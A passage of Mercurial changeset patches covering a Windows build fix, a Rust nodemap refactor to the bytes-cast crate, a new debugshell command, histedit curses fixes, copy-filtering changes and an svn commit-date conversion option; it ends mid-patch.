cext: restore the ability to build on Windows with py2 This broke in e92ca942ddca. Differential Revision: https://phab.mercurial-scm.org/D9867 diff --git a/contrib/python-zstandard/zstd/common/pythoncapi_compat.h b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h --- a/contrib/python-zstandard/zstd/common/pythoncapi_compat.h +++ b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h @@ -20,6 +20,11 @@ #include "frameobject.h" // PyFrameObject, PyFrame_GetBack() +/* VC 2008 doesn't know about the inline keyword. */ +#if defined(_MSC_VER) && _MSC_VER < 1900 +#define inline __forceinline +#endif + // Cast argument to PyObject* type. #ifndef _PyObject_CAST # define _PyObject_CAST(op) ((PyObject*)(op)) diff --git a/mercurial/pythoncapi_compat.h b/mercurial/pythoncapi_compat.h --- a/mercurial/pythoncapi_compat.h +++ b/mercurial/pythoncapi_compat.h @@ -20,6 +20,11 @@ #include "frameobject.h" // PyFrameObject, PyFrame_GetBack() +/* VC 2008 doesn't know about the inline keyword. */ +#if defined(_MSC_VER) && _MSC_VER < 1900 +#define inline __forceinline +#endif + // Cast argument to PyObject* type. #ifndef _PyObject_CAST # define _PyObject_CAST(op) ((PyObject*)(op)) # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1610723514 -3600 # Fri Jan 15 16:11:54 2021 +0100 # Node ID 0800aa42bb4c3132ef0558fb938ab1050dc9ca19 # Parent 38b9a63d3a13176a2d83a13898d51fe617e5ecda rust: use the bytes-cast crate to parse persistent nodemaps This crate casts pointers to custom structs, with compile-time safety checks, for easy and efficient binary data parsing. See https://crates.io/crates/bytes-cast and https://docs.rs/bytes-cast/0.1.0/bytes_cast/ Differential Revision: https://phab.mercurial-scm.org/D9788 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -55,6 +55,24 @@ source = "registry+https://github.com/rust-lang/crates.io-index" [[package]] +name = "bytes-cast" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "bytes-cast-derive 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] +name = "bytes-cast-derive" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", + "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", + "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] name = "cc" version = "1.0.66" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -277,6 +295,7 @@ version = "0.1.0" dependencies = [ "byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)", + "bytes-cast 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)", "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", @@ -910,6 +929,8 @@ "checksum bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693" "checksum bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2" "checksum byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de" +"checksum bytes-cast 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3196ba300c7bc9282a4331e878496cb3e9603a898a8f1446601317163e16ca52" +"checksum bytes-cast-derive 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "cb936af9de38476664d6b58e529aff30d482e4ce1c5e150293d00730b0d81fdb" "checksum cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)" = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48" "checksum cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)" = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822" "checksum cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -9,6 +9,7 @@ name = "hg" [dependencies] +bytes-cast = "0.1" byteorder = "1.3.4" hex = "0.4.2" im-rc = "15.0.*" diff --git a/rust/hg-core/src/revlog/nodemap.rs b/rust/hg-core/src/revlog/nodemap.rs --- a/rust/hg-core/src/revlog/nodemap.rs +++ b/rust/hg-core/src/revlog/nodemap.rs @@ -17,12 +17,12 @@ RevlogIndex, NULL_REVISION, }; +use bytes_cast::{unaligned, BytesCast}; use std::cmp::max; use std::fmt; -use std::mem; +use std::mem::{self, align_of, size_of}; use std::ops::Deref; use std::ops::Index; -use std::slice; #[derive(Debug, PartialEq)] pub enum NodeMapError { @@ -149,7 +149,7 @@ /// Low level NodeTree [`Blocks`] elements /// /// These are exactly as for instance on persistent storage. -type RawElement = i32; +type RawElement = unaligned::I32Be; /// High level representation of values in NodeTree /// [`Blocks`](struct.Block.html) @@ -168,23 +168,24 @@ /// /// See [`Block`](struct.Block.html) for explanation about the encoding. fn from(raw: RawElement) -> Element { - if raw >= 0 { - Element::Block(raw as usize) - } else if raw == -1 { + let int = raw.get(); + if int >= 0 { + Element::Block(int as usize) + } else if int == -1 { Element::None } else { - Element::Rev(-raw - 2) + Element::Rev(-int - 2) } } } impl From<Element> for RawElement { fn from(element: Element) -> RawElement { - match element { + RawElement::from(match element { Element::None => 0, - Element::Block(i) => i as RawElement, + Element::Block(i) => i as i32, Element::Rev(rev) => -rev - 2, - } + }) } } @@ -212,42 +213,24 @@ /// represented at all, because we want an immutable empty nodetree /// to be valid. -#[derive(Copy, Clone)] -pub struct Block([u8; BLOCK_SIZE]); +const ELEMENTS_PER_BLOCK: usize = 16; // number of different values in a nybble -/// Not derivable for arrays of length >32 until const generics are stable -impl PartialEq for Block { - fn eq(&self, other: &Self) -> bool { - self.0[..] == other.0[..] - } -} - -pub const BLOCK_SIZE: usize = 64; +#[derive(Copy, Clone, BytesCast, PartialEq)] +#[repr(transparent)] +pub struct Block([RawElement; ELEMENTS_PER_BLOCK]); impl Block { fn new() -> Self { - // -1 in 2's complement to create an absent node - let byte: u8 = 255; - Block([byte; BLOCK_SIZE]) + let absent_node = RawElement::from(-1); + Block([absent_node; ELEMENTS_PER_BLOCK]) } fn get(&self, nybble: u8) -> Element { - let index = nybble as usize * mem::size_of::<RawElement>(); - Element::from(RawElement::from_be_bytes([ - self.0[index], - self.0[index + 1], - self.0[index + 2], - self.0[index + 3], - ])) + self.0[nybble as usize].into() } fn set(&mut self, nybble: u8, element: Element) { - let values = RawElement::to_be_bytes(element.into()); - let index = nybble as usize * mem::size_of::<RawElement>(); - self.0[index] = values[0]; - self.0[index + 1] = values[1]; - self.0[index + 2] = values[2]; - self.0[index + 3] = values[3]; + self.0[nybble as usize] = element.into() } } @@ -398,16 +381,17 @@ // Transmute the `Vec<Block>` to a `Vec<u8>`. Blocks are contiguous // bytes, so this is perfectly safe. let bytes = unsafe { - // Assert that `Block` hasn't been changed and has no padding - let _: [u8; 4 * BLOCK_SIZE] = - std::mem::transmute([Block::new(); 4]); + // Check for compatible allocation layout. + // (Optimized away by constant-folding + dead code elimination.) + assert_eq!(size_of::<Block>(), 64); + assert_eq!(align_of::<Block>(), 1); // /!\ Any use of `vec` after this is use-after-free. // TODO: use `into_raw_parts` once stabilized Vec::from_raw_parts( vec.as_ptr() as *mut u8, - vec.len() * BLOCK_SIZE, - vec.capacity() * BLOCK_SIZE, + vec.len() * size_of::<Block>(), + vec.capacity() * size_of::<Block>(), ) }; (readonly, bytes) @@ -613,7 +597,7 @@ amount: usize, ) -> Self { assert!(buffer.len() >= amount); - let len_in_blocks = amount / BLOCK_SIZE; + let len_in_blocks = amount / size_of::<Block>(); NodeTreeBytes { buffer, len_in_blocks, @@ -625,12 +609,11 @@ type Target = [Block]; fn deref(&self) -> &[Block] { - unsafe { - slice::from_raw_parts( - (&self.buffer).as_ptr() as *const Block, - self.len_in_blocks, - ) - } + Block::slice_from_bytes(&self.buffer, self.len_in_blocks) + // `NodeTreeBytes::new` already asserted that `self.buffer` is + // large enough. + .unwrap() + .0 } } @@ -774,13 +757,13 @@ let mut raw = [255u8; 64]; let mut counter = 0; - for val in [0, 15, -2, -1, -3].iter() { - for byte in RawElement::to_be_bytes(*val).iter() { + for val in [0_i32, 15, -2, -1, -3].iter() { + for byte in val.to_be_bytes().iter() { raw[counter] = *byte; counter += 1; } } - let block = Block(raw); + let (block, _) = Block::from_bytes(&raw).unwrap(); assert_eq!(block.get(0), Element::Block(0)); assert_eq!(block.get(1), Element::Block(15)); assert_eq!(block.get(3), Element::None); @@ -1108,7 +1091,7 @@ let (_, bytes) = idx.nt.into_readonly_and_added_bytes(); // only the root block has been changed - assert_eq!(bytes.len(), BLOCK_SIZE); + assert_eq!(bytes.len(), size_of::<Block>()); // big endian for -2 assert_eq!(&bytes[4..2 * 4], [255, 255, 255, 254]); // big endian for -6 diff --git a/rust/hg-core/src/revlog/nodemap_docket.rs b/rust/hg-core/src/revlog/nodemap_docket.rs --- a/rust/hg-core/src/revlog/nodemap_docket.rs +++ b/rust/hg-core/src/revlog/nodemap_docket.rs @@ -1,5 +1,5 @@ +use bytes_cast::{unaligned, BytesCast}; use memmap::Mmap; -use std::convert::TryInto; use std::path::{Path, PathBuf}; use super::revlog::RevlogError; @@ -13,6 +13,16 @@ // TODO: keep here more of the data from `parse()` when we need it } +#[derive(BytesCast)] +#[repr(C)] +struct DocketHeader { + uid_size: u8, + _tip_rev: unaligned::U64Be, + data_length: unaligned::U64Be, + _data_unused: unaligned::U64Be, + tip_node_size: unaligned::U64Be, +} + impl NodeMapDocket { /// Return `Ok(None)` when the caller should proceed without a persistent /// nodemap: @@ -36,25 +46,22 @@ Ok(bytes) => bytes, }; - let mut input = if let Some((&ONDISK_VERSION, rest)) = + let input = if let Some((&ONDISK_VERSION, rest)) = docket_bytes.split_first() { rest } else { return Ok(None); }; - let input = &mut input; - let uid_size = read_u8(input)? as usize; - let _tip_rev = read_be_u64(input)?; + let (header, rest) = DocketHeader::from_bytes(input)?; + let uid_size = header.uid_size as usize; // TODO: do we care about overflow for 4 GB+ nodemap files on 32-bit // systems? - let data_length = read_be_u64(input)? as usize; - let _data_unused = read_be_u64(input)?; - let tip_node_size = read_be_u64(input)? as usize; - let uid = read_bytes(input, uid_size)?; - let _tip_node = read_bytes(input, tip_node_size)?; - + let tip_node_size = header.tip_node_size.get() as usize; + let data_length = header.data_length.get() as usize; + let (uid, rest) = u8::slice_from_bytes(rest, uid_size)?; + let (_tip_node, _rest) = u8::slice_from_bytes(rest, tip_node_size)?; let uid = std::str::from_utf8(uid).map_err(|_| RevlogError::Corrupted)?; let docket = NodeMapDocket { data_length }; @@ -81,29 +88,6 @@ } } -fn read_bytes<'a>( - input: &mut &'a [u8], - count: usize, -) -> Result<&'a [u8], RevlogError> { - if let Some(start) = input.get(..count) { - *input = &input[count..]; - Ok(start) - } else { - Err(RevlogError::Corrupted) - } -} - -fn read_u8<'a>(input: &mut &[u8]) -> Result<u8, RevlogError> { - Ok(read_bytes(input, 1)?[0]) -} - -fn read_be_u64<'a>(input: &mut &[u8]) -> Result<u64, RevlogError> { - let array = read_bytes(input, std::mem::size_of::<u64>())? - .try_into() - .unwrap(); - Ok(u64::from_be_bytes(array)) -} - fn rawdata_path(docket_path: &Path, uid: &str) -> PathBuf { let docket_name = docket_path .file_name() diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -29,6 +29,12 @@ UnknowDataFormat(u8), } +impl From<bytes_cast::FromBytesError> for RevlogError { + fn from(_: bytes_cast::FromBytesError) -> Self { + RevlogError::Corrupted + } +} + /// Read only implementation of revlog. pub struct Revlog { /// When index and data are not interleaved: bytes of the revlog index. # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611570863 -3600 # Mon Jan 25 11:34:23 2021 +0100 # Node ID cfb6c10c08c218e80ff43a3f935cd1e44cfb451a # Parent 0800aa42bb4c3132ef0558fb938ab1050dc9ca19 rust: replace an unsafe use of transmute with a safe use of bytes-cast Differential Revision: https://phab.mercurial-scm.org/D9859 diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -8,8 +8,9 @@ //! In Mercurial code base, it is customary to call "a node" the binary SHA //! of a revision. +use bytes_cast::BytesCast; use hex::{self, FromHex, FromHexError}; -use std::convert::{TryFrom, TryInto}; +use std::convert::TryFrom; /// The length in bytes of a `Node` /// @@ -49,7 +50,7 @@ /// /// [`nybbles_len`]: #method.nybbles_len /// [`ExactLengthRequired`]: struct.NodeError#variant.ExactLengthRequired -#[derive(Clone, Debug, PartialEq)] +#[derive(Clone, Debug, PartialEq, BytesCast)] #[repr(transparent)] pub struct Node { data: NodeData, @@ -68,14 +69,14 @@ /// Return an error if the slice has an unexpected length impl<'a> TryFrom<&'a [u8]> for &'a Node { - type Error = std::array::TryFromSliceError; + type Error = (); #[inline] fn try_from(bytes: &'a [u8]) -> Result<&'a Node, Self::Error> { - let data = bytes.try_into()?; - // Safety: `#[repr(transparent)]` makes it ok to "wrap" the target - // of a reference to the type of the single field. - Ok(unsafe { std::mem::transmute::<&NodeData, &Node>(data) }) + match Node::from_bytes(bytes) { + Ok((node, rest)) if rest.is_empty() => Ok(node), + _ => Err(()), + } } } # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611616776 -3600 # Tue Jan 26 00:19:36 2021 +0100 # Node ID f25c770c217b2a1b35c66bc5e68aac968af2a275 # Parent cfb6c10c08c218e80ff43a3f935cd1e44cfb451a debugshell: add a simple command for starting an interactive shell This simplifies interactive exploration of the Mercurial APIs. The ui and repo instances are provided as local variables. Differential Revision: https://phab.mercurial-scm.org/D9866 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -3717,6 +3717,23 @@ ui.writenoi18n(b' revision %s\n' % v[1]) +@command(b'debugshell', optionalrepo=True) +def debugshell(ui, repo): + """run an interactive Python interpreter + + The local namespace is provided with a reference to the ui and + the repo instance (if available). + """ + import code + + imported_objects = { + 'ui': ui, + 'repo': repo, + } + + code.interact(local=imported_objects) + + @command( b'debugsuccessorssets', [(b'', b'closest', False, _(b'return closest successors sets only'))], diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -130,6 +130,7 @@ debugrevspec debugserve debugsetparents + debugshell debugsidedata debugssl debugstrip @@ -319,6 +320,7 @@ debugrevspec: optimize, show-revs, show-set, show-stage, no-optimized, verify-optimized debugserve: sshstdio, logiofd, logiofile debugsetparents: + debugshell: debugsidedata: changelog, manifest, dir debugssl: debugstrip: rev, force, no-backup, nobackup, , keep, bookmark, soft diff --git a/tests/test-help.t b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -1069,6 +1069,7 @@ debugsetparents manually set the parents of the current working directory (DANGEROUS) + debugshell run an interactive Python interpreter debugsidedata dump the side data for a cl/manifest/file revision debugssl test a secure connection to a server # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1611699930 18000 # Tue Jan 26 17:25:30 2021 -0500 # Node ID 66e8e279133bb4abd3b63b0eb344ee9931321ec1 # Parent f25c770c217b2a1b35c66bc5e68aac968af2a275 hghave: list the module needed for the `vcr` check I'm tired of having to look up modules each time I setup a system, and try to distinguish between similar package names to get the right one. Now that the search API has been disabled, it's even harder. There are other python packages here that should be listed like this, but this is the one that came up missing today, so it's a start. Differential Revision: https://phab.mercurial-scm.org/D9879 diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -1034,7 +1034,7 @@ return matchoutput('sqlite3 -version', br'^3\.\d+') -@check('vcr', 'vcr http mocking library') +@check('vcr', 'vcr http mocking library (pytest-vcr)') def has_vcr(): try: import vcr # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1611347352 18000 # Fri Jan 22 15:29:12 2021 -0500 # Node ID 8477c91b5e8e981e531e78f885197401fbee7ddf # Parent 66e8e279133bb4abd3b63b0eb344ee9931321ec1 histedit: don't assign to _ for unused values I don't know what this ignored value is, but we need to not clobber the _() function from gettext, or we get mysterious crashes instead of internationalizing some strings in my upcoming patches. Differential Revision: https://phab.mercurial-scm.org/D9853 diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -1615,7 +1615,7 @@ stdscr.refresh() while True: try: - oldmode, _ = state[b'mode'] + oldmode, unused = state[b'mode'] if oldmode == MODE_INIT: changemode(state, MODE_RULES) e = event(state, ch) @@ -1630,7 +1630,7 @@ if size != stdscr.getmaxyx(): curses.resizeterm(*size) - curmode, _ = state[b'mode'] + curmode, unused = state[b'mode'] sizes = layout(curmode) if curmode != oldmode: state[b'page_height'] = sizes[b'main'][0] # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1611347520 18000 # Fri Jan 22 15:32:00 2021 -0500 # Node ID a936e570288daffd18bd1d518ce0bf885891c823 # Parent 8477c91b5e8e981e531e78f885197401fbee7ddf histedit: notice when the main window underflows height and abort If you try to have a 13-line-tall terminal and use curses histedit, it fails by spinning in an infinite loop due to the catch-all ignore of curses errors on line 1682 of histedit.py. We should also fix that catch-all ignore of curses errors (what other demons lurk here, I wonder?) but we can trivially catch this case and guide the user to a happy path. We've seen this mostly in IDE users that have a tendency to have really tiny embedded terminal windows. Differential Revision: https://phab.mercurial-scm.org/D9854 diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -1581,10 +1581,19 @@ def layout(mode): maxy, maxx = stdscr.getmaxyx() helplen = len(helplines(mode)) + mainlen = maxy - helplen - 12 + if mainlen < 1: + raise error.Abort( + _(b"terminal dimensions %d by %d too small for curses histedit") + % (maxy, maxx), + hint=_( + b"enlarge your terminal or use --config ui.interface=text" + ), + ) return { b'commit': (12, maxx), b'help': (helplen, maxx), - b'main': (maxy - helplen - 12, maxx), + b'main': (mainlen, maxx), } def drawvertwin(size, y, x): # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1611348186 18000 # Fri Jan 22 15:43:06 2021 -0500 # Node ID 11ce2977572f058fdf3ea12cb69d480b24a24efc # Parent a936e570288daffd18bd1d518ce0bf885891c823 histedit: rip out mysterious catch-all ignore curses.error handler I have no idea why this was here, and ripping it out doesn't obviously break anything for me (tests all pass, I can poke around chistedit UI a bit without issue), so I'm thinking we should rip it out and see if we get bug reports. Differential Revision: https://phab.mercurial-scm.org/D9855 diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -1623,63 +1623,60 @@ stdscr.clear() stdscr.refresh() while True: - try: - oldmode, unused = state[b'mode'] - if oldmode == MODE_INIT: - changemode(state, MODE_RULES) - e = event(state, ch) - - if e == E_QUIT: - return False - if e == E_HISTEDIT: - return state[b'rules'] + oldmode, unused = state[b'mode'] + if oldmode == MODE_INIT: + changemode(state, MODE_RULES) + e = event(state, ch) + + if e == E_QUIT: + return False + if e == E_HISTEDIT: + return state[b'rules'] + else: + if e == E_RESIZE: + size = screen_size() + if size != stdscr.getmaxyx(): + curses.resizeterm(*size) + + curmode, unused = state[b'mode'] + sizes = layout(curmode) + if curmode != oldmode: + state[b'page_height'] = sizes[b'main'][0] + # Adjust the view to fit the current screen size. + movecursor(state, state[b'pos'], state[b'pos']) + + # Pack the windows against the top, each pane spread across the + # full width of the screen. + y, x = (0, 0) + helpwin, y, x = drawvertwin(sizes[b'help'], y, x) + mainwin, y, x = drawvertwin(sizes[b'main'], y, x) + commitwin, y, x = drawvertwin(sizes[b'commit'], y, x) + + if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP): + if e == E_PAGEDOWN: + changeview(state, +1, b'page') + elif e == E_PAGEUP: + changeview(state, -1, b'page') + elif e == E_LINEDOWN: + changeview(state, +1, b'line') + elif e == E_LINEUP: + changeview(state, -1, b'line') + + # start rendering + commitwin.erase() + helpwin.erase() + mainwin.erase() + if curmode == MODE_PATCH: + renderpatch(mainwin, state) + elif curmode == MODE_HELP: + renderstring(mainwin, state, __doc__.strip().splitlines()) else: - if e == E_RESIZE: - size = screen_size() - if size != stdscr.getmaxyx(): - curses.resizeterm(*size) - - curmode, unused = state[b'mode'] - sizes = layout(curmode) - if curmode != oldmode: - state[b'page_height'] = sizes[b'main'][0] - # Adjust the view to fit the current screen size. - movecursor(state, state[b'pos'], state[b'pos']) - - # Pack the windows against the top, each pane spread across the - # full width of the screen. - y, x = (0, 0) - helpwin, y, x = drawvertwin(sizes[b'help'], y, x) - mainwin, y, x = drawvertwin(sizes[b'main'], y, x) - commitwin, y, x = drawvertwin(sizes[b'commit'], y, x) - - if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP): - if e == E_PAGEDOWN: - changeview(state, +1, b'page') - elif e == E_PAGEUP: - changeview(state, -1, b'page') - elif e == E_LINEDOWN: - changeview(state, +1, b'line') - elif e == E_LINEUP: - changeview(state, -1, b'line') - - # start rendering - commitwin.erase() - helpwin.erase() - mainwin.erase() - if curmode == MODE_PATCH: - renderpatch(mainwin, state) - elif curmode == MODE_HELP: - renderstring(mainwin, state, __doc__.strip().splitlines()) - else: - renderrules(mainwin, state) - rendercommit(commitwin, state) - renderhelp(helpwin, state) - curses.doupdate() - # done rendering - ch = encoding.strtolocal(stdscr.getkey()) - except curses.error: - pass + renderrules(mainwin, state) + rendercommit(commitwin, state) + renderhelp(helpwin, state) + curses.doupdate() + # done rendering + ch = encoding.strtolocal(stdscr.getkey()) def _chistedit(ui, repo, freeargs, opts): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610759935 -3600 # Sat Jan 16 02:18:55 2021 +0100 # Node ID f213b250fed0c88c7be9f32538477dd64eab8184 # Parent 11ce2977572f058fdf3ea12cb69d480b24a24efc copies: explicitly filter out existing file in graftcopies The `graftcopies` function does something very strange (maybe even wrong), it calls `_filter` with a pair of changeset that does not match the one used to compute the copies informations. We are about to do some rework of `_filter` to make it closer to its documented intent and fix a couple of bug. This means some of the logic that only make sense for graft need to go somewhere else. We add the extra filtering with proper documentation to `graftcopies`. Differential Revision: https://phab.mercurial-scm.org/D9802 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -1220,6 +1220,12 @@ by merge.update(). """ new_copies = pathcopies(base, ctx) - _filter(wctx.p1(), wctx, new_copies) + parent = wctx.p1() + _filter(parent, wctx, new_copies) + # extra filtering to drop copy information for files that existed before + # the graft (otherwise we would create merge filelog for non-merge commit + for dest, __ in list(new_copies.items()): + if dest in parent: + del new_copies[dest] for dst, src in pycompat.iteritems(new_copies): wctx[dst].markcopied(src) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610750991 -3600 # Fri Jan 15 23:49:51 2021 +0100 # Node ID 154ded9104f1dc773fe0b6b7f7aa4423bbe2ba00 # Parent f213b250fed0c88c7be9f32538477dd64eab8184 copies: clarify which case some conditional are handling This make the function a bit clearer. The middle conditional get no label because we about about to remove it. See next changeset for details. Differential Revision: https://phab.mercurial-scm.org/D9794 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -60,13 +60,13 @@ for k, v in list(t.items()): # remove copies from files that didn't exist - if v not in src: + if v not in src: # case 5 del t[k] # remove criss-crossed copies elif k in src and v in dst: del t[k] # remove copies to files that were then removed - elif k not in dst: + elif k not in dst: # case 1 del t[k] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610751521 -3600 # Fri Jan 15 23:58:41 2021 +0100 # Node ID 1d6d1a15a96344a505645991794333f26761ca79 # Parent 154ded9104f1dc773fe0b6b7f7aa4423bbe2ba00 copies: simplify the conditional for _filter's case 3 The conditional is much simpler and the test are actually happier. This clarification of the conditional will also be necessary to properly support tracing more renames in a coming changeset. Differential Revision: https://phab.mercurial-scm.org/D9795 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -59,14 +59,13 @@ # Cases 1, 3, and 5 are then removed by _filter(). for k, v in list(t.items()): - # remove copies from files that didn't exist - if v not in src: # case 5 + if k == v: # case 3 del t[k] - # remove criss-crossed copies - elif k in src and v in dst: + elif v not in src: # case 5 + # remove copies from files that didn't exist del t[k] - # remove copies to files that were then removed elif k not in dst: # case 1 + # remove copies to files that were then removed del t[k] diff --git a/tests/test-copies.t b/tests/test-copies.t --- a/tests/test-copies.t +++ b/tests/test-copies.t @@ -93,8 +93,8 @@ x y $ hg debugp1copies -r 1 x -> y -Incorrectly doesn't show the rename $ hg debugpathcopies 0 1 + x -> y (no-filelog !) Copy a file onto another file with same content. If metadata is stored in changeset, this does not produce a new filelog entry. The changeset's "files" entry should still list the file. @@ -111,8 +111,8 @@ x x2 $ hg debugp1copies -r 1 x -> x2 -Incorrectly doesn't show the rename $ hg debugpathcopies 0 1 + x -> x2 (no-filelog !) Rename file in a loop: x->y->z->x $ newrepo # HG changeset patch # User Nikita Slyusarev <nslus@yandex-team.com> # Date 1610399476 -10800 # Tue Jan 12 00:11:16 2021 +0300 # Node ID 7525e77b5eac36f88b655a6067fe1969af733003 # Parent 1d6d1a15a96344a505645991794333f26761ca79 convert: option to set date and time for svn commits Converting to subversion repository is not preserving original commit dates as it may break some subversion functionality if commit dates are not monotonically increasing. This patch adds `convert.svn.dangerous-set-commit-dates` configuration option to change this behaviour and enable commit dates convertion for those who want to take risks. Subversion always uses commit dates with UTC timezone, so only timestamps are used. Test `test-convert-svn-sink.t` uses `svnxml.py` script to dump history of svn repositories. Atm the script is not printing `date` field from svn log. This patch changes this to allow checks on correctness of date and time convertion. Documentation is updated. Additional test case is added to test commit dates convertion. Differential Revision: https://phab.mercurial-scm.org/D9721 diff --git a/hgext/convert/__init__.py b/hgext/convert/__init__.py --- a/hgext/convert/__init__.py +++ b/hgext/convert/__init__.py @@ -491,6 +491,22 @@ :convert.skiptags: does not convert tags from the source repo to the target repo. The default is False. + + Subversion Destination + ###################### + + Original commit dates are not preserved by default. + + :convert.svn.dangerous-set-commit-dates: preserve original commit dates, + forcefully setting ``svn:date`` revision properties. This option is + DANGEROUS and may break some subversion functionality for the resulting + repository (e.g. filtering revisions with date ranges in ``svn log``), + as original commit dates are not guaranteed to be monotonically + increasing. + + For commit dates setting to work destination repository must have + ``pre-revprop-change`` hook configured to allow setting of ``svn:date`` + revision properties. See Subversion documentation for more details. """ return convcmd.convert(ui, src, dest, revmapfile, **opts) diff --git a/hgext/convert/subversion.py b/hgext/convert/subversion.py --- a/hgext/convert/subversion.py +++ b/hgext/convert/subversion.py @@ -97,6 +97,17 @@ return s.decode(fsencoding).encode('utf-8') +def formatsvndate(date): + return dateutil.datestr(date, b'%Y-%m-%dT%H:%M:%S.000000Z') + + +def parsesvndate(s): + # Example SVN datetime. Includes microseconds. + # ISO-8601 conformant + # '2007-01-04T17:35:00.902377Z' + return dateutil.parsedate(s[:19] + b' UTC', [b'%Y-%m-%dT%H:%M:%S']) + + class SvnPathNotFound(Exception): pass @@ -1158,12 +1169,7 @@ continue paths.append((path, ent)) - # Example SVN datetime. Includes microseconds. - # ISO-8601 conformant - # '2007-01-04T17:35:00.902377Z' - date = dateutil.parsedate( - date[:19] + b" UTC", [b"%Y-%m-%dT%H:%M:%S"] - ) + date = parsesvndate(date) if self.ui.configbool(b'convert', b'localtimezone'): date = makedatetimestamp(date[0]) @@ -1380,7 +1386,7 @@ return logstream(stdout) -pre_revprop_change = b'''#!/bin/sh +pre_revprop_change_template = b'''#!/bin/sh REPOS="$1" REV="$2" @@ -1388,15 +1394,26 @@ PROPNAME="$4" ACTION="$5" -if [ "$ACTION" = "M" -a "$PROPNAME" = "svn:log" ]; then exit 0; fi -if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-branch" ]; then exit 0; fi -if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-rev" ]; then exit 0; fi +%(rules)s echo "Changing prohibited revision property" >&2 exit 1 ''' +def gen_pre_revprop_change_hook(prop_actions_allowed): + rules = [] + for action, propname in prop_actions_allowed: + rules.append( + ( + b'if [ "$ACTION" = "%s" -a "$PROPNAME" = "%s" ]; ' + b'then exit 0; fi' + ) + % (action, propname) + ) + return pre_revprop_change_template % {b'rules': b'\n'.join(rules)} + + class svn_sink(converter_sink, commandline): commit_re = re.compile(br'Committed revision (\d+).', re.M) uuid_re = re.compile(br'Repository UUID:\s*(\S+)', re.M) @@ -1470,9 +1487,20 @@ self.is_exec = None if created: + prop_actions_allowed = [ + (b'M', b'svn:log'), + (b'A', b'hg:convert-branch'), + (b'A', b'hg:convert-rev'), + ] + + if self.ui.configbool( + b'convert', b'svn.dangerous-set-commit-dates' + ): + prop_actions_allowed.append((b'M', b'svn:date')) + hook = os.path.join(created, b'hooks', b'pre-revprop-change') fp = 